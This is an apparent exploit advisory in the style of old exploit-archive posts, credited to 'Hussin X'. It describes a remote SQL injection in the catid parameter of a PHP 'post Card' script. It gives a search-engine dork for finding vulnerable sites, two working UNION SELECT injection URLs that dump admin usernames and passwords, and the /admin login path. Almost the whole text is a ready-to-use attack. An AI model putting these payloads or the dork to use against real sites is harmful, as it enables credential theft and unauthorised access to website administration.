post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : darkangeL_G85@Yahoo.CoM
___________________________________
script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
DorK : inurl:choosecard.php?catid=
_____
ExploiT & Demo
_______
post Card v 1.01
http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
post Card v 1.02
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
Note : Exploit in Properties Picture
Login :
______
/admin
Greetz : All my freind
Im IraQi | Im TrYaGi